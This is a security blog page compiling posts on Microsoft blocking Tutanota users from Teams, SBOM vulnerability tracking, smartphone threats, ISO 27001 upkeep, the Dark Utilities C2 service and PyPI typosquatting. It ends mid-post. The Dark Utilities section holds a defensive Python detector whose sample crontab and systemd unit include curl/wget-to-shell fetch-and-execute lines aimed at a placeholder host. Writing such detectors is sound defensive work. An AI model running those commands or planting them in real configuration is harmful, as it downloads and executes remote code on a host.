InfoSec and Compliance – With 20 years of blogging experience, DISC InfoSec blog is dedicated to providing trusted insights and practical solutions for professionals and organizations navigating the evolving cybersecurity landscape. From cutting-edge threats to compliance strategies, this blog is your reliable resource for staying informed and secure. Dive into the content, connect with the community, and elevate your InfoSec expertise!
Microsoft is actively blocking Tutanota email addresses from registering a Microsoft Teams account.
Tutanota is an end-to-end encrypted email app and a freemium secure email service; as of March 2017, Tutanota's owners claimed to have over 2 million users.
The news is that Microsoft is actively blocking Tutanota email addresses from registering a Microsoft Teams account.
“Politicians on both sides of the Atlantic are discussing stronger antitrust legislation to regulate Big Tech – and such laws are badly needed as the blocking of Tutanota users from Microsoft Teams demonstrates. Big Tech companies have the market power to harm smaller competitors with some very easy steps like refusing smaller companies’ customers from using their own services.” reads a comment shared by the German email service provider. “Currently, Microsoft is actively blocking Tutanota email addresses from registering a Microsoft Teams account. This severe anti-competitive practice forces our customers to register a second email address – possibly one from Microsoft themselves – to create a Teams account.”
Microsoft does not classify Tutanota as an email service provider; it treats the Tutanota domain as a single corporate domain.
The first time a Tutanota user registered a Teams account, the domain was recorded as belonging to one corporation. As a result, every other user of the email service was unable to register their own account and was told to contact their admin.
“We repeatedly tried to solve the issue with Microsoft, but unfortunately our request was ignored”, says Matthias Pfau, co-founder of Tutanota.
“Microsoft would only have to change the settings that Tutanota is an email service so that everyone can register an individual account but they (Microsoft) say such a change is not possible.”
Let’s see if Microsoft will solve the issue, allowing 2 million users to use its MS Teams service.
We have built cybersecurity solution sheets for our clients, which we would like to share with you. They can be a useful resource when you need to remediate risk. They are in PDF format and can be downloaded.
You can choose the course based on your specific needs:
ISO 27001 Foundations course – you’ll learn about all of the standard’s requirements and the best practices for compliance.
ISO 27001 Internal Auditor course – besides the knowledge about the standard, you’ll also learn how to perform an internal audit in the company.
ISO 27001 Lead Auditor course – besides the knowledge about the standard, it also includes the training you need to become certified as a certification auditor.
ISO 27001 Lead Implementer course – besides the knowledge about the standard, it also includes the training you need to become an independent consultant for Information Security Management System implementation.
The online courses are suitable both for beginners and experienced professionals.
Learn at your preferred speed from any location at any time.
If you have any questions, feel free to send us an email to info@deurainfosec.com
Software Bill of Material and Vulnerability Management Blind Spots
Open source software is everywhere (which is not a bad thing in itself). However, many buyers have no inventory of the open source components included in the software products they buy. Businesses even fail to keep track of the open source components used in internally developed applications. As a result, vulnerability management programs have blind spots.
Take an inventory of open source software (standalone and libraries) and make it part of your vulnerability management program.
Why it matters:
Use of open source software is not bad in itself. Everyone uses it; the biggest examples are Linux and the Apache HTTP Server.
Many commercial software vendors use open source components but don’t properly and adequately disclose all open source components included in the commercial products.
Recent vulnerabilities (e.g. log4j) have far reaching impact.
Software applications developed in-house also include open source components. As these applications age and the initial developers move on to new jobs, older and vulnerable open source components can stay in the applications unnoticed for a long time.
What to do:
It is crucial to have an up-to-date inventory of all open source software, whether used as a standalone product or embedded as a library inside a product. You cannot manage what you do not know exists.
Require your software vendors to provide you with a list of all open source libraries and their versions embedded into their products.
Make this list part of the vulnerability management program. Monitor release of new vulnerabilities and patches for your inventory of open source software components.
When building a bill of materials for open source components, it is imperative not only to contact your software vendors but also to review all applications developed in-house. Source code and dependency scanning tools can help build the inventory of these components.
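As an added example (not part of the original post), here is a small Python script that reads a CycloneDX-style SBOM and checks every component against a vulnerability list, which is what "make the list part of the vulnerability management program" looks like in practice. The SBOM document, the `example-parser` component and the `EXAMPLE-0001` advisory are constructed for illustration; the Log4j entry uses the real CVE-2021-44228 range (Log4j 2 versions before 2.15.0). The version comparison is deliberately coarse and ignores pre-release tags and backported fix releases.

```python
"""Cross-check an SBOM of open source components against a vulnerability list.

Added example, not part of the original post. SAMPLE_SBOM is a constructed
CycloneDX-style document; in practice it comes from your vendor or from a
dependency scanner, and the vulnerability data from an advisory feed.
"""
import json
import re

# purl = pkg:<type>/[<namespace>/]<name>@<version>; type and namespace pin
# the ecosystem so "requests" on PyPI is not confused with a Maven artefact.
PURL_RE = re.compile(
    r"^pkg:(?P<type>[^/]+)/(?:(?P<namespace>[^@]+)/)?(?P<name>[^/@]+)@(?P<version>[^?#]+)"
)

# Constructed SBOM excerpt (not a real product's bill of materials).
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "components": [
        {"name": "log4j-core", "version": "2.14.1", "group": "org.apache.logging.log4j",
         "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
        {"name": "log4j-core", "version": "2.17.1", "group": "org.apache.logging.log4j",
         "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1"},
        {"name": "example-parser", "version": "1.2.0",
         "purl": "pkg:generic/example-parser@1.2.0"},
        {"name": "requests", "version": "2.28.1",
         "purl": "pkg:pypi/requests@2.28.1"},
    ],
})

# (type, namespace, name) -> [(affected_from_inclusive, fixed_in_exclusive, advisory)].
# The Log4j range is the real CVE-2021-44228 one (fixed in 2.15.0);
# example-parser / EXAMPLE-0001 is a constructed placeholder.
VULN_DB = {
    ("maven", "org.apache.logging.log4j", "log4j-core"): [("2.0", "2.15.0", "CVE-2021-44228")],
    ("generic", "", "example-parser"): [("1.0.0", "1.3.0", "EXAMPLE-0001")],
}


def parse_version(version):
    """Numeric comparison key: '2.14.1' -> (2, 14, 1).

    Pre-release tags such as '-beta9' are dropped, so this is a coarse
    comparison; a production check needs ecosystem-aware version rules.
    """
    return tuple(int(n) for n in re.findall(r"\d+", version))


def inventory(sbom_json):
    """Return (type, namespace, name, version) for every component.

    The purl is preferred because it identifies the ecosystem unambiguously;
    components without one fall back to the bare name and group.
    """
    bom = json.loads(sbom_json)
    items = []
    for comp in bom.get("components", []):
        m = PURL_RE.match(comp.get("purl", ""))
        if m:
            items.append((m["type"], m["namespace"] or "", m["name"], m["version"]))
        else:
            items.append(("unknown", comp.get("group", ""), comp["name"], comp["version"]))
    return items


def find_vulnerable(sbom_json, vuln_db):
    """List every component whose version falls inside a known affected range."""
    findings = []
    for ptype, ns, name, version in inventory(sbom_json):
        for start, fixed, advisory in vuln_db.get((ptype, ns, name), []):
            if parse_version(start) <= parse_version(version) < parse_version(fixed):
                findings.append({"name": name, "version": version,
                                 "advisory": advisory, "fixed_in": fixed})
    return findings


if __name__ == "__main__":
    for f in find_vulnerable(SAMPLE_SBOM, VULN_DB):
        print(f"{f['name']} {f['version']}: {f['advisory']} (fixed in {f['fixed_in']})")
```

Run against the sample, the script flags log4j-core 2.14.1 and example-parser 1.2.0 and stays silent on the patched log4j-core 2.17.1. The same loop runs unchanged over a vendor-supplied SBOM, which is the point: once the inventory exists, re-checking it after every advisory is a few seconds of work.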
Here are the top phone security threats in 2022 and how to avoid them
Your handset is always at risk of being exploited. Here’s what to look out for.
Our mobile devices are now the keys to our communication, finances, and social lives — and because of this, they are lucrative targets for cybercriminals.
Whether or not you use a Google Android or Apple iOS smartphone, threat actors are constantly evolving their tactics to break into them.
This includes everything from basic spam and malicious links sent over social media to malware capable of spying on you, compromising your banking apps, or deploying ransomware on your device.
The top threats to Android and iOS smartphone security in 2022
Phishing and smishing
Phishing occurs when attackers send you fake and fraudulent messages. Cybercriminals attempt to lure you into sharing personal information, clicking malicious links, downloading and unwittingly executing malware on your device, or handing over your account details — for a bank, PayPal, social network, email, and more.
Mobile devices are subject to phishing through every avenue PCs are, including email and social network messages. However, mobile devices are also vulnerable to smishing, which are phishing attempts sent over SMS texts.
Regarding phishing, it doesn’t matter if you are using an Android or an iOS device. To fraudsters and cybercriminals, all mobile devices are created equally.
Your best defense: Don't click on links in emails or text messages unless you are 100% sure they're legitimate.
Physical security
Many of us forget an essential security measure: physically securing our mobile devices. We may not use a PIN, pattern, or a biometric check such as a fingerprint or retina scan — and if so, we are making our handset vulnerable to tampering. In addition, if you leave your phone unattended, it may be at risk of theft.
Your best defense: Lock down your phone with a strong password or PIN, at a minimum, so that if it ends up in the wrong hands, your data and accounts can't be accessed.
SIM hijacking
SIM hijacking, also known as SIM swapping or SIM porting, is the abuse of a legitimate service offered by telecom firms when customers need to switch their SIM and telephone numbers between operators or handsets.
Usually, a customer would call their telecom provider and request a switch. An attacker, however, will use social engineering and the personal details they discover about you — including your name, physical address, and contact details — to assume your identity and to dupe customer service representatives into giving them control of your number.
In a successful attack, the cybercriminal can redirect your phone calls and texts to a handset they own. Importantly, this also means that any two-factor authentication (2FA) codes delivered by SMS to protect your email, social media, and banking accounts, among others, end up in their hands.
SIM hijacking is usually a targeted attack, as it takes data collection and effort to pull off. When it succeeds, however, it can be disastrous for your privacy and the security of your online accounts.
Your best defense: Protect your data through an array of cybersecurity best practices so that it can’t be used against you via social engineering. Consider asking your telecom provider to add a “Do not port” note to your file (unless you visit in person).
Nuisanceware, premium service dialers, cryptocurrency miners
Your mobile device is also at risk of nuisanceware and malicious software that will force the device to either make calls or send messages to premium numbers.
Nuisanceware is malware found in apps (more commonly in the Android ecosystem in comparison to iOS) which makes your handset act annoyingly. Usually not dangerous but still irritating and a drain on your power, nuisanceware may show you pop-up adverts, interrupt your tasks with promotions or survey requests, or open up pages in your mobile browser without permission.
While nuisanceware can generate ad impressions through users, premium service dialers are worse. Apps may contain hidden functions that will covertly sign you up to premium, paid services, send texts, or make calls — and while you end up paying for these ‘services,’ the attacker gets paid.
Some apps may quietly steal your device’s computing resources to mine for cryptocurrency.
Your best defense: Only download apps from legitimate app stores and carefully evaluate what permissions you're allowing them to have.
Open Wi-Fi
Open and unsecured Wi-Fi hotspots are everywhere, from hotel rooms to coffee shops. They are intended to be a customer service, but their open nature also opens them up to attack.
Specifically, your handset or PC can be exposed to Man-in-the-Middle (MitM) attacks on an open Wi-Fi network. An attacker on the same network can intercept the traffic between your handset and the services it talks to, reading unencrypted data, injecting malware payloads, and potentially taking over your device.
You also come across ‘honeypot’ Wi-Fi hotspots every so often. These are open Wi-Fi hotspots created by cybercriminals, disguised as legitimate and free spots, for the sole purpose of performing MiTM.
Your best defense: Avoid using public Wi-Fi altogether and use mobile networks instead. If you must connect to them, at least consider using a virtual private network (VPN).
Surveillance, spying, and stalkerware
Surveillanceware, spyware, and stalkerware come in various forms. Spyware is often generic and will be used by cyberattackers to steal information including PII and financial details. However, surveillanceware and stalkerware are normally more personal and targeted; for example, in the case of domestic abuse, a partner may install surveillance software on your phone to keep track of your contacts, phone calls, GPS location, and who you are communicating with, and when.
Your best defense: An antivirus scan should take care of generic spyware, and while there’s no magic bullet for surveillanceware or stalkerware, you should watch out for any suspicious or unusual behavior on your device. If you think you are being monitored, put your physical safety above all else. See our guide for how to find and remove stalkerware from your phone.
Ransomware
Ransomware can impact mobile devices as well as PCs. Ransomware will attempt to encrypt files and directories, locking you out of your phone, and will demand payment — commonly in cryptocurrency — through a blackmail landing page. Cryptolocker and Koler are prime examples.
Ransomware is often found in third-party apps or deployed as a payload on malicious websites. For example, you may see a pop-up request to download an app — disguised as everything from a software cracker to a pornography viewer — and your handset can then be encrypted in mere minutes.
Your best defense: Keep your phone up-to-date with the latest firmware, your Android or iOS handset’s fundamental security protections on, and don’t download apps from sources outside official repositories.
Trojans, financial malware
There are countless mobile malware variants, but Google's and Apple's built-in protections stop many in their tracks. Of the malware families you should be aware of, however, trojans top the list.
Trojans are forms of malware that are developed with data theft and financial gains in mind. Mobile variants include EventBot, MaliBot, and Drinik.
Most of the time, users download the malware themselves, which may be packaged up as an innocent and legitimate app or service. However, once they have landed on your handset, they overlay a banking app’s window and steal the credentials you submit. This information is then sent to an attacker and can be used to pillage your bank account. Some variants may also intercept 2FA verification codes.
The majority of financial trojans target Android handsets. iOS variants are rarer, but strains including XCodeGhost still exist.
Your best defense: Keep your phone up-to-date with the latest firmware, keep your Android or iOS handset's fundamental security protections on, and don't download apps from sources outside official repositories. If you suspect your phone has been compromised, stop using financial apps, cut off your internet connection, and run both a personal check and an antivirus scan.
Mobile device management exploits
Mobile Device Management (MDM) solutions are enterprise-grade tools suited for the workforce. MDM features can include secure channels for employees to access corporate resources and software, spreading a company’s network security solutions and scans to each endpoint device, and blocking malicious links and websites.
However, if the central MDM solution is infiltrated or otherwise compromised, every enrolled mobile device is also at risk of data leakage, surveillance, or hijacking.
Your best defense: The nature of MDM solutions takes control out of the hands of end users, so you cannot protect against an MDM compromise yourself. What you can do is maintain basic security hygiene on your device, keep it up to date, and keep your personal apps and information off work devices.
How can I physically protect my device?
Your lock screen is the gateway to your device, data, photos, private documents, and apps. As such, keeping it secure is paramount.
On Android, consider these settings:
Screen lock type: Swipe, pattern, PIN, password, and biometric checks using fingerprints or your face
Smart lock: Keeps your phone unlocked when it is with you, and you can decide what situations are considered safe
Auto factory resets: Automatically wipes your phone after 15 incorrect attempts to unlock
Notifications: Select what notifications show up and what content is displayed, even when your phone is locked
Lockdown mode: From Android 9.0, lockdown mode can be enabled
Find my Device: Find, lock, or erase your lost device
On iOS devices, check out:
Passcode: set a passcode to unlock your device
Face ID, Touch ID: Biometrics can be used to unlock your device, use apps, and make payments
Find my iPhone: Find, track, and block your lost iPhone
Lockdown mode: Apple previewed its own version of lockdown mode in July. Dubbed "extreme" protection for a small pool of users, the upcoming feature will provide improved security for malicious links and connections, as well as wired connections when an iPhone is locked.
What should I look out for as symptoms of a malware infection?
If you notice your Android or iOS device is not behaving normally, you may have been infected by malware or be otherwise compromised.
Things to watch out for are:
Battery life drain: Batteries degrade over time, and constantly running high-power mobile apps drains them quickly. However, if your handset is suddenly hot and losing power exceptionally fast, this could signify malicious apps and software burning up your resources.
Unexpected behavior: If your smartphone is behaving differently and you’ve recently installed new apps or services, this could indicate that all is not well.
Unknown apps: Software that suddenly appears on your device, especially if you have allowed the installation of apps from unidentified developers or have a jailbroken smartphone, could be malware or surveillance apps that have been installed without your knowledge or consent.
Browser changes: Browser hijacking, changes to a different search engine, web page pop-ups, and ending up on pages you didn’t mean to could all be a sign of malicious software tampering with your device and data.
Unexpected bills: Premium number scams and services are operated by threat actors to generate fraudulent income. If you have unexpected charges, calls, or texts to premium numbers, this could mean you are a victim of these threats.
Service disruption: SIM hijacking is a severe threat. This is normally a targeted attack with a particular goal, such as stealing your cryptocurrency or accessing your online bank account. The first sign of attack is that your phone service suddenly cuts off, which indicates your telephone number has been transferred elsewhere. A lack of signal, no ability to call, or a warning that you are limited to emergency calls only can indicate a SIM swap has taken place. Furthermore, you may see account reset notifications on email or alerts that a new device has been added to your existing services.
What about Pegasus and government-grade malware?
On occasion, enterprise and government-grade malware hit the headlines. Known variants include Pegasus and Hermit, used by law enforcement and governments to spy on everyone from journalists to lawyers and activists.
In June 2022, Google Threat Analysis Group (TAG) researchers warned that Hermit, a sophisticated form of iOS and Android spyware, is exploiting zero-day vulnerabilities and is now in active circulation.
The malware tries to root devices and capture every detail of a victim’s digital life, including their calls, messages, logs, photos, and GPS location.
However, the likelihood of you being targeted by these expensive, paid-for malware packages is low unless you are a high-profile individual of interest to a government willing to go to these lengths. You are far more likely to be targeted by phishing, generic malware, or, unfortunately, friends and family members who are using stalkerware against you.
What should I do if I think my Android or iOS phone is compromised?
If you suspect your Android or iOS device has been infected with malware or otherwise compromised, take urgent action to protect your privacy and security. Consider the steps below:
Run a malware scan: You should ensure your handset is up-to-date with the latest operating system and firmware, as updates usually include patches for security vulnerabilities that can be exploited in attacks or malware distribution. Google and Apple offer security protection for users, but it wouldn’t hurt to download a dedicated antivirus app. Options include Avast, Bitdefender, and Norton. Even if you stick to the free versions of these apps, it’s far better than nothing.
Delete suspicious apps: Deleting strange apps isn’t foolproof, but any apps you don’t recognize or use should be removed. In the cases of nuisanceware, for example, deleting the app can be enough to restore your handset to normal. You should also avoid downloading apps from third-party developers outside of Google Play and the Apple Store that you do not trust.
Revisit permissions: From time to time, you should check the permission levels of apps on your mobile device. If they appear to be far too extensive for the app’s functions or utilities, consider revoking them or deleting the app entirely. Keep in mind that some developers, especially in the Android ecosystem, will offer helpful utilities and apps in Google Play only to turn them malicious down the line.
Tighten up communication channels: You should never use open, public Wi-Fi networks. Instead, stick to mobile networks; if you don’t need them, turn off Bluetooth, GPS, and any other features that could broadcast your data.
Premium service dialers: If you’ve had unexpected bills, go through your apps and delete anything suspicious. You can also call your telecom provider and ask them to block premium numbers and SMS messages.
Ransomware: There are several options if you have unfortunately become the victim of mobile ransomware and cannot access your device.
If you were alerted to the ransomware before your device is encrypted and a ransom note is displayed, cut off the internet and any other connections — including any wired links to other devices — and boot up your mobile in Safe Mode. You might be able to delete the offending app, run an antivirus scan, and clean up before any significant damage occurs.
However, if your handset is locked, your next steps are more limited, as removing the malware only deals with part of the problem.
If you know what ransomware variant is on your handset, you can try using a decryption tool such as those listed by the No More Ransom project. You can also provide information to Crypto Sheriff, and researchers will try and find out what type of malware you’re dealing with for free.
In the worst-case scenario, you might need to perform a factory reset. Removing ransomware stops it from spreading further but will not restore files that have been encrypted. You can restore your device following a reset if you’ve consistently backed up your data.
Remember, paying a ransom does not guarantee that your files will be decrypted and returned to you.
Stalkerware, surveillanceware: When you know or suspect you’ve been targeted by stalkerware or surveillanceware, this can be extremely difficult to handle. If it’s the case that basic, generic spyware has landed on your device, Google, Apple, or a dedicated antivirus app should pick this up for you and remove it.
However, suppose a partner or other close contact is monitoring you, and you try to remove a stalkerware app from your phone. In that case, they will be alerted directly, or they will become aware because they are no longer receiving your information.
You shouldn’t try to remove these apps if this risks your physical safety. Indeed, some commercially-available forms of spyware damage a handset so severely that the operator can remotely reinstall them, anyway, and the only real option is to throw the device away (or keep it for law enforcement purposes).
Reach out to an organization that can help you, consider using a burner phone if you can, and keep yourself as physically safe as possible.
SIM hijacking: If you suspect you have been SIM-swapped, you have a very short window for damage control. The first thing you should do is call your telecom provider and try to have your service restored as quickly as possible — but as we all know, you can be left on hold for an infuriatingly long time.
If you can, go and visit your carrier in person, in-store.
No one is exempt from the risk of SIM swaps, customer service representatives may not have been trained to recognize SIM hijacking, and cybercriminals may have enough of your personal information to pass as you without challenge.
To mitigate the risk in the first place, consider linking your crucial 'hub' accounts, financial services, and cryptocurrency wallets to a number that isn't publicly connected to you. A simple pay-as-you-go number will do, so that if your personal or work numbers are compromised, the opportunities for theft are limited.
Whether you’re a small organisation with limited resources or an international firm, achieving ISO 27001 certification will be a challenge.
Anyone who has already been through the process will know that. You must assemble a team, conduct a gap analysis and risk assessment, apply security controls, create documentation and perform staff awareness training. And that’s before you even get into internal audits and certification audits.
To make matters more complicated, once you’ve certified to ISO 27001, you must maintain your compliance status and regularly recertify.
Organisations must do this to ensure that they have maintained their compliance practices and accounted for changes in the way they operate.
In this blog, we look at the key issues you must address if you are to maintain ISO 27001 compliance.
How often do you need to recertify to ISO 27001?
An organisation’s ISO 27001 certification lasts three years. The certificate itself will state the date at which certification was issued and when it will expire.
As that day approaches, the organisation must apply for recertification. This can be with the same body that performed the initial audit or it can be with another registrar.
How to maintain ISO 27001 certification
Organisations can ensure that their ISO 27001 practices remain compliant by following these seven steps.
1. Continually test and review risks
Your ISMS (information security management system) was built to address risks that you identified during the certification process, but the threat landscape is constantly evolving.
As such, you must regularly monitor the risks you face to ensure that your defences are adequate. Part of this process will involve vulnerability scans and other tools that can automatically spot new risks. However, you should also perform more rigorous tests on a regular basis.
To remain compliant, you must complete an ISO 27001 risk assessment at least once a year or whenever you make substantial changes to your organisation.
You can use the results of the assessment to determine whether your controls work as intended and whether additional defences should be adopted.
2. Keep documentation up to date
The policies and processes you wrote during the initial implementation will have been created specifically for the way your organisation operated at that time.
However, your operations will no doubt evolve and you need to ensure that your documentation takes that into account. Have you made a significant change in the way you perform certain actions? Have you undertaken new activities involving sensitive data? Has the physical premises changed in any way?
If the answer to any of those questions is yes, then you must amend your documentation accordingly.
3. Perform internal audits
An internal audit provides a comprehensive review of the effectiveness of your ISMS. Alongside a risk assessment and a documentation review, it will help you assess the status of your ISO 27001 compliance.
You will have conducted an internal audit as part of your initial certification process, so you should already have the framework to hand, which you can repeat as part of your compliance maintenance.
4. Keep senior management informed
Unless you are extremely lucky, the maintenance practices outlined above will reveal weaknesses that you must address if you are to remain compliant.
Remedying those vulnerabilities will take time and resources, which requires you to gain board-level approval. As such, you should keep senior management informed of both your activities maintaining the ISMS and the benefits that it has brought.
For example, your defences might have played a direct role in preventing a data breach or cyber attack. If so, you should have logged and investigated the event, in which case you’ll have proof of the ISMS’s effectiveness that you can bring to the board.
An ISMS isn’t just about preventing security breaches, though. It also helps organisations operate more efficiently and responsibly. You should also provide evidence of this, presenting key performance indicators and interviews with employees and other stakeholders.
5. Establish a regular management review process
In addition to informing the board of the ISMS’s successes, you should also involve them in the review process. This is where you can discuss opportunities for improvement or necessary changes that must be made.
There is no requirement for how often the management review should take place, but it should be at least once a year and ideally every six months.
6. Stay on top of corrective actions
If there’s a theme to these tips, it’s that your ISMS isn’t set in stone. As such, it should evolve to meet the threats that your organisation faces.
By regularly monitoring the effectiveness of your ISMS, you should be able to perform corrective actions that prevent weaknesses from spilling over into major problems. Some of these changes could be minor tweaks to processes and policies, or the addition of a new tool.
However, some corrective actions will require a significant overhaul of your practices. These should be discussed during the management review process and could involve ongoing adjustments and monitoring.
7. Promote ongoing information security staff awareness
One of the key principles of ISO 27001 is that effective information security is everybody’s responsibility. Compliance should not be left to the IT department or managers.
Anyone in the organisation that handles sensitive data plays a role in the organisation’s security. They must understand their obligations for protecting sensitive information and appreciate the stakes involved.
You are required to provide staff awareness training as part of your certification process, but those lessons should be repeated on a regular basis. As with your management review, it should be at least annually but ideally twice yearly.
For organisations looking for a quick and effective way to meet their staff awareness training requirements, IT Governance is here to help.
With this 45-minute training course, you can enable your employees to demonstrate their competence in information security and ISO 27001 with digital badges.
The package comes with an annual licence, making it quick and easy to refresh employees’ knowledge on a regular basis.
Security researchers found a new service called Dark Utilities that provides an easy and inexpensive way for cybercriminals to set up a command and control (C2) center for their malicious operations.
The Dark Utilities service provides threat actors a platform that supports Windows, Linux, and Python-based payloads, and eliminates the effort associated with implementing a C2 communication channel.
A C2 server is how adversaries control their malware in the wild, sending out commands, configurations and new payloads, and receiving data collected from compromised systems.
The Dark Utilities operation is a ‘C2-as-a-service’ (C2aaS) that advertises reliable, anonymous C2 infrastructure and all the required additional functions for a starting price of just EUR 9,99.
A report from Cisco Talos says that the service has around 3,000 active subscribers, which would bring the operators a revenue of about EUR 30,000.
Dark Utilities login portal (Cisco)
Dark Utilities emerged in early 2022 and offers full-blown C2 capabilities both on the Tor network and on the clear web. It hosts payloads in the Interplanetary File System (IPFS) – a decentralized network system for storing and sharing data.
Multiple architectures are supported and it appears that the operators are planning on expanding the list to provide a larger set of options of devices that could be targeted.
Platform selection on payload screen (Cisco)
Cisco Talos researchers say that selecting an operating system generates a command string that “threat actors are typically embedding into PowerShell or Bash scripts to facilitate the retrieval and execution of the payload on victim machines.”
The selected payload also establishes persistence on the target system by creating a Registry key on Windows, or a Crontab entry or a Systemd service on Linux.
According to the researchers, the administrative panel comes with multiple modules for various types of attack, including distributed denial-of-service (DDoS) and cryptojacking.
With thousands of threat actors already subscribed and such a low price, Dark Utilities is likely to attract an even larger crowd of less-skilled adversaries.
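The retrieval and persistence pattern just described (a one-line fetch-and-execute embedded in a Bash or PowerShell script, dropped into a crontab entry or a systemd unit, with payloads served from IPFS) is something a defender can scan for on Linux hosts. The following Python is an added example and is not part of the Cisco Talos research or of the Dark Utilities platform itself; the crontab and unit file it scans are constructed samples, and the IP address and IPFS path in them are placeholders. The two heuristics it applies are "a downloader piped straight into an interpreter" and "any reference to an IPFS path or gateway".

```python
import re
from typing import Dict, List

# Constructed sample inputs for this example (not taken from the Cisco Talos report):
# a user crontab and a systemd unit file, each with one benign and one suspicious entry.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot curl -s http://203.0.113.10/p/a.sh | bash
*/5 * * * * wget -qO- https://ipfs.example.net/ipfs/QmExampleCidForIllustration | sh
"""

SAMPLE_UNIT = """\
[Unit]
Description=System Update Helper

[Service]
ExecStart=/bin/bash -c 'curl -fsSL http://203.0.113.10/agent.py | python3'
Restart=always

[Install]
WantedBy=multi-user.target
"""

# A downloader followed by a pipe into an interpreter is the classic shape of a generated
# "retrieve and execute" command string; an IPFS reference matches the hosting pattern
# described above. Both are heuristics, not signatures, so expect to tune them.
DOWNLOADER = re.compile(r"\b(curl|wget|fetch)\b")
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(ba|z|da)?sh\b|\|\s*python3?\b|\|\s*perl\b")
IPFS_REF = re.compile(r"/ipfs/|\bipfs://|\bipns://", re.IGNORECASE)


def suspicious_reasons(command: str) -> List[str]:
    """Return the heuristics a single command line trips (empty list means clean)."""
    reasons = []
    if DOWNLOADER.search(command) and PIPE_TO_INTERPRETER.search(command):
        reasons.append("remote download piped straight into an interpreter")
    if IPFS_REF.search(command):
        reasons.append("payload referenced via IPFS")
    return reasons


def scan_crontab(text: str) -> List[Dict[str, object]]:
    """Flag crontab lines whose command part trips a heuristic."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value assignment line
        # '@reboot cmd' has one schedule field; 'm h dom mon dow cmd' has five.
        fields = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        command = fields[-1] if len(fields) > 1 else ""
        reasons = suspicious_reasons(command)
        if reasons:
            findings.append({"source": "crontab", "line": lineno, "command": command, "reasons": reasons})
    return findings


def scan_systemd_unit(text: str, name: str = "unit") -> List[Dict[str, object]]:
    """Flag ExecStart/ExecStartPre/ExecStartPost lines in a systemd unit file."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not re.match(r"ExecStart(Pre|Post)?=", line):
            continue
        command = line.split("=", 1)[1].lstrip("-@+!:")  # drop systemd exec-prefix characters
        reasons = suspicious_reasons(command)
        if reasons:
            findings.append({"source": name, "line": lineno, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    hits = scan_crontab(SAMPLE_CRONTAB) + scan_systemd_unit(SAMPLE_UNIT, "update-helper.service")
    for hit in hits:
        print(f"{hit['source']}:{hit['line']}: {hit['command']}\n    -> {'; '.join(hit['reasons'])}")
```

On a live host you would feed it the output of `crontab -l` for each user, the files under /etc/cron.d and /var/spool/cron, and the unit files under /etc/systemd/system and ~/.config/systemd/user; the Windows half of the same check (a Run-key value that launches PowerShell with a download cradle) follows the same idea but needs the registry rather than text files.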
Just over a year ago, we wrote about a “cybersecurity researcher” who posted almost 4000 pointlessly poisoned Python packages to the popular repository PyPI.
This person went by the curious nickname of Remind Supply Chain Risks, and the packages had project names that were generally similar to well-known projects, presumably in the hope that some of them would get installed by mistake, thanks to users using slightly incorrect search terms or making minor typing mistakes when typing in PyPI URLs.
These pointless packages weren’t overtly malicious, but they did call home to a server hosted in Japan, presumably so that the perpetrator could collect statistics on this “experiment” and write it up while pretending it counted as science.
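The near-miss names described above are detectable before anything gets installed. The following Python is an added example, not code from the original post, from PyPI or from the person behind the packages: it normalises project names the way PyPI does (PEP 503), computes edit distance against a small constructed list of well-known projects, folds a few common digit-for-letter substitutions, and flags candidates that are one or two edits away from a popular name without actually being that name. The POPULAR and CANDIDATES lists are constructed for illustration.

```python
import re
from typing import Dict, List, Optional

# Constructed list of "well-known" project names for this example; in practice this would
# be the most-downloaded projects or the names your own requirements files pin.
POPULAR = ["requests", "urllib3", "numpy", "django", "flask", "beautifulsoup4", "cryptography"]

# Constructed candidate names that mimic the near-miss pattern described above.
CANDIDATES = ["requsts", "Requests", "urlib3", "numpy", "djangoo", "crypt0graphy", "pandas", "beautifulsoup4"]

_NORMALISE = re.compile(r"[-_.]+")


def normalise(name: str) -> str:
    """PEP 503 normalisation: case-insensitive, runs of '-', '_' and '.' collapse to one '-'."""
    return _NORMALISE.sub("-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) using a single-row dynamic programme."""
    if len(a) < len(b):
        a, b = b, a
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


# Digit-for-letter substitutions commonly used in look-alike names (0 for o, 1 for l, ...).
_HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})


def closest_popular(name: str, popular: List[str]) -> Optional[str]:
    """Return the popular project this name is suspiciously close to, or None.

    An exact (normalised) match is the genuine project and is never flagged.
    Short names get a budget of one edit and longer names two, so 'requsts'
    and 'urlib3' are caught while an unrelated name such as 'pandas' is not.
    """
    n = normalise(name)
    pop = {normalise(p) for p in popular}
    if n in pop:
        return None
    folded = n.translate(_HOMOGLYPHS)
    best = None
    for p in pop:
        budget = 1 if len(p) < 8 else 2
        d = min(levenshtein(n, p), levenshtein(folded, p))
        if d <= budget and (best is None or d < best[0]):
            best = (d, p)
    return best[1] if best else None


def typosquat_report(candidates: List[str], popular: List[str]) -> Dict[str, str]:
    """Map each suspicious candidate to the project it shadows."""
    report = {}
    for candidate in candidates:
        target = closest_popular(candidate, popular)
        if target:
            report[candidate] = target
    return report


if __name__ == "__main__":
    for bad, target in typosquat_report(CANDIDATES, POPULAR).items():
        print(f"{bad!r} looks like a typosquat of {target!r}")
```

Run as a pre-install hook or in CI, the report is a review list rather than an automatic block: the edit-distance budget is a heuristic, and legitimate forks and plugins (name plus a suffix) will sometimes land inside it.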
A month after that, we wrote about a PhD student (who should have known better) and their supervisor (who is apparently an Assistant Professor of Computer Science at a US university, and very definitely should have known better) who went out of their way to introduce numerous apparently legitimate but not-strictly-needed patches into the Linux kernel.
